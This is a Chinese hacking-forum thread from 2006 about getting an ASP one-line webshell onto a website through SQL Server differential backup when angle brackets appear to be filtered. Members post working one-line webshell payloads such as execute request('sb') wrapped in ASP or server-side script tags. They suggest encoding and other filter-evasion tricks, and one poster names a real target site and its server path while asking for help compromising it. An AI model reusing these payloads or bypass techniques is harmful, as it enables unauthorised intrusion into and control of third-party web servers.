‹‹ 上一主题 | 下一主题 ››
 37 12
发新话题
打印

[讨论]遇到差异备分过滤了<>怎么办?

凋凌玫瑰

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
81 
精华
12 
积分
3855 
阅读权限
200 
性别
男 
在线时间
57 小时 
注册时间
2006-2-26 
最后登录
2009-1-8 
楼主 发表于 2006-10-9 00:46  只看该作者

[讨论]遇到差异备分过滤了<>怎么办?

议题作者:凋凌玫瑰
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

我在差异备后打开的文件显示如下:
Microsoft VBScript 编译器错误 错误 '800a0408'

无效字符

/gbook/test3.asp,行 71

%Execute(request("abc"))%
^

备分的代码是:<%%25Execute(request("ah"))%%25>

好像是"<>"被过滤了

不知道这种情况咋个解决,请高手指点.

TOP

守护天使

晶莹剔透§烈日灼然

Rank: 1

帖子
46 
精华
0 
积分
76 
阅读权限
40 
来自
深圳 
在线时间
120 小时 
注册时间
2006-4-25 
最后登录
2008-2-29 
沙发 发表于 2006-10-9 00:50  只看该作者
[s:74] 我遇过

写成"%><%execute request("sb")%><%"这样来试试呢。。

TOP

低调的沉默

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
3 小时 
注册时间
2006-10-9 
最后登录
2008-12-3 
椅子 发表于 2006-10-9 04:50  只看该作者
我的写成"%><%execute request("sb")%><%"不行!
低调无罪,沉默有理

TOP

cool俊

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
15 小时 
注册时间
2005-6-14 
最后登录
2008-11-27 
板凳 发表于 2006-10-9 21:06  只看该作者
为什么不用nbsi3.0的log备份?
getwebshell就很好用..实在要差异备份.
就把一句木马转换成16进制再插入或者加上转义字符试试.还有可以把<>换成%lt;跟%gt;。换成%lt;,%gt;我没试过..不知道行不行...
详细自已到baidu搜搜啦..呵呵.我记不太清楚了

TOP

凋凌玫瑰

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
81 
精华
12 
积分
3855 
阅读权限
200 
性别
男 
在线时间
57 小时 
注册时间
2006-2-26 
最后登录
2009-1-8 
地板 发表于 2006-10-9 22:17  只看该作者
nbsi3.0的log备份试了,根本就写不进去一句话,转换成十六进制也试了,不行.

TOP

hack520

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1082 
精华
6 
积分
5594 
阅读权限
150 
性别
男 
在线时间
579 小时 
注册时间
2005-3-18 
最后登录
2008-8-31 
6楼 发表于 2006-10-9 22:44  只看该作者
[s:75]  实话告诉你吧,没搞. [s:75]
Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注:此账号密码已更改,请本人与冰血联系修改密码。

TOP

cnhcerkf

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
374 
精华
2 
积分
3971 
阅读权限
150 
性别
男 
在线时间
709 小时 
注册时间
2006-8-27 
最后登录
2008-12-9 
7楼 发表于 2006-10-9 23:12  只看该作者
同意楼上的,楼主为什么不换一个别的思路?能够back了意思是不是DBO的权限,得到了目录呢?为什么不看下别的目录有没有可以利用的东西?如果有别的目录为什么不去下层目录呢?
如果能找到管理员的一个TXT你就应该发了。
珍爱生命,潜心修炼,早日成仙。

TOP

dsaddd

禁止发言

帖子
精华
0 
积分
-401 
阅读权限
在线时间
0 小时 
注册时间
2006-10-9 
最后登录
2006-10-10 
8楼 发表于 2006-10-10 02:05  只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

TOP

某牛人

晶莹剔透§烈日灼然

Rank: 1

帖子
28 
精华
0 
积分
82 
阅读权限
40 
在线时间
55 小时 
注册时间
2006-3-2 
最后登录
2007-11-11 
9楼 发表于 2006-10-10 02:12  只看该作者
如果真的过滤了<的话
会提示在那个地方出错??
其实没有过滤的
自己写段代码到ASP里面
看怎么才会出现类似的错误吧。

TOP

神無月

晶莹剔透§烈日灼然

Rank: 1

帖子
124 
精华
0 
积分
313 
阅读权限
40 
性别
男 
在线时间
37 小时 
注册时间
2006-4-22 
最后登录
2008-6-9 
10楼 发表于 2006-10-10 06:31  只看该作者
要是确定是过滤<>了      估计没门了.

TOP

凋凌玫瑰

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
81 
精华
12 
积分
3855 
阅读权限
200 
性别
男 
在线时间
57 小时 
注册时间
2006-2-26 
最后登录
2009-1-8 
11楼 发表于 2006-10-10 10:22  只看该作者
引用:
这里是引用第[5 楼]hack5202006-10-09 22:44发表的:
[s:75]  实话告诉你吧,没搞. [s:75]
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.

TOP

cnhcerkf

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
374 
精华
2 
积分
3971 
阅读权限
150 
性别
男 
在线时间
709 小时 
注册时间
2006-8-27 
最后登录
2008-12-9 
12楼 发表于 2006-10-10 10:33  只看该作者
楼上的,既然得了webshell,能否把代码帖出来的?看他什么以什么方式过滤,替换或者是什么的,可能有方法,就跟那个aaspsp似的。。
珍爱生命,潜心修炼,早日成仙。

TOP

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1119 小时 
注册时间
2007-10-23 
最后登录
2009-1-4 

资料收集奖 运营支持奖

13楼 发表于 2006-10-10 21:48  只看该作者
没可能过滤 <>  过滤了<>,他网站还能运行吗?  估计是%号的原因.
  上面都有提示了 % 无效字符.

  你试下这个  <script language=VBScript runat=server>execute request("sb")</Script>

TOP

hack520

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1082 
精华
6 
积分
5594 
阅读权限
150 
性别
男 
在线时间
579 小时 
注册时间
2005-3-18 
最后登录
2008-8-31 
14楼 发表于 2006-10-11 18:04  只看该作者
引用:
这里是引用第[10 楼]凋凌玫瑰2006-10-10 10:22发表的:




搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.
偶滴意思是说,过滤了<>,要是通过bluk,确实木搞。当然咯,搞站大法也不是就这几下吧~~ [s:75]  [s:75]
Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注:此账号密码已更改,请本人与冰血联系修改密码。

TOP

走在云上

晶莹剔透§烈日灼然

Rank: 1

帖子
13 
精华
0 
积分
15 
阅读权限
40 
在线时间
17 小时 
注册时间
2006-8-9 
最后登录
2008-8-10 
15楼 发表于 2006-10-18 20:41  只看该作者
字符转换不行的话就不知道了
哈哈 我是菜鸟我怕谁

TOP

菜菜阿哲

晶莹剔透§烈日灼然

Rank: 1

帖子
16 
精华
0 
积分
46 
阅读权限
40 
在线时间
27 小时 
注册时间
2006-10-5 
最后登录
2007-7-19 
16楼 发表于 2006-10-21 21:13  只看该作者
我杂遇见的比他还郁闷 我差异悲愤的整个马都消失了 猪三哥帮给看看贝

http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039

e:\czfdcw.com.cn\

悲愤出来的就没俺的一句话

TOP

平安年间

晶莹剔透§烈日灼然

Rank: 1

帖子
66 
精华
2 
积分
251 
阅读权限
40 
性别
男 
在线时间
16 小时 
注册时间
2006-10-3 
最后登录
2008-11-17 
17楼 发表于 2006-10-22 18:32  只看该作者
前后加%><%execute request("#")%><%应是可行的,不过备份后可能又会出新的错误

什么什么无效字符类的提示

如果不行,可以试下lake2的unicode字符
并非高手

TOP

akens

晶莹剔透§烈日灼然

Rank: 1

帖子
25 
精华
0 
积分
62 
阅读权限
40 
性别
男 
在线时间
111 小时 
注册时间
2006-9-30 
最后登录
2008-12-31 
18楼 发表于 2006-10-23 15:12  只看该作者
楼上的,话怎么说一半就说了呢
UNICODE具体怎么实现

TOP

akens

晶莹剔透§烈日灼然

Rank: 1

帖子
25 
精华
0 
积分
62 
阅读权限
40 
性别
男 
在线时间
111 小时 
注册时间
2006-9-30 
最后登录
2008-12-31 
19楼 发表于 2006-10-23 15:14  只看该作者
我提交一句话出现这个问题
Active Server Pages 错误 &#39;ASP 0141&#39;

Page 命令重复

/ken.asp,行 714

@ 命令只能在 Active Server Page 中使用一次。
谁来解释下呢

TOP

trace

晶莹剔透§烈日灼然

Rank: 1

帖子
112 
精华
0 
积分
305 
阅读权限
40 
性别
男 
在线时间
139 小时 
注册时间
2006-4-3 
最后登录
2009-1-7 
20楼 发表于 2006-10-23 17:29  只看该作者
引用:
这里是引用第[18 楼]akens2006-10-23 15:14发表的:
我提交一句话出现这个问题
Active Server Pages 错误 &#39;ASP 0141&#39;

Page 命令重复

.......
估计他asp代码首句是
<%@language=VBScript%>
而你又指定了脚本语言一次.

TOP

风云逸剑

晶莹剔透§烈日灼然

Rank: 1

帖子
69 
精华
0 
积分
218 
阅读权限
40 
性别
男 
在线时间
185 小时 
注册时间
2006-4-12 
最后登录
2008-12-26 
21楼 发表于 2006-10-28 17:37  只看该作者
郁闷呀  

我还遇上不能SA不能备份 [s:34]

TOP

xunix

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
13 
阅读权限
40 
性别
男 
在线时间
11 小时 
注册时间
2006-5-29 
最后登录
2008-12-1 
22楼 发表于 2006-10-29 06:20  只看该作者
我遇到的 和你差不多
我的还多一样,就是把我的所有的语句读给写三次
我传个文本上去居然也是三次
我这个的原因估计是我把IIS配置里面的那个防止错误选项勾上了
现在上网不方便也没有深究。
有条件的朋友那个2003实验一下
做人还是脚踏实地的好

TOP

追寻

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
602 
精华
2 
积分
4612 
阅读权限
100 
性别
男 
在线时间
595 小时 
注册时间
2006-9-23 
最后登录
2009-1-9 
23楼 发表于 2006-10-29 06:55  只看该作者
我一般备份不成功的话就会去尝试列目录找找网站的数据库。然后XXXX

TOP

cnxhack

晶莹剔透§烈日灼然

Rank: 1

帖子
17 
精华
0 
积分
53 
阅读权限
40 
性别
男 
在线时间
7 小时 
注册时间
2006-5-3 
最后登录
2008-12-20 
24楼 发表于 2006-10-29 23:32  只看该作者

TOP

可酷可乐

晶莹剔透§烈日灼然

Rank: 1

帖子
58 
精华
0 
积分
161 
阅读权限
40 
在线时间
41 小时 
注册时间
2005-11-5 
最后登录
2008-10-9 
25楼 发表于 2006-11-9 17:57  只看该作者

TOP

‹‹ 上一主题 | 下一主题 ››
 37 12
发新话题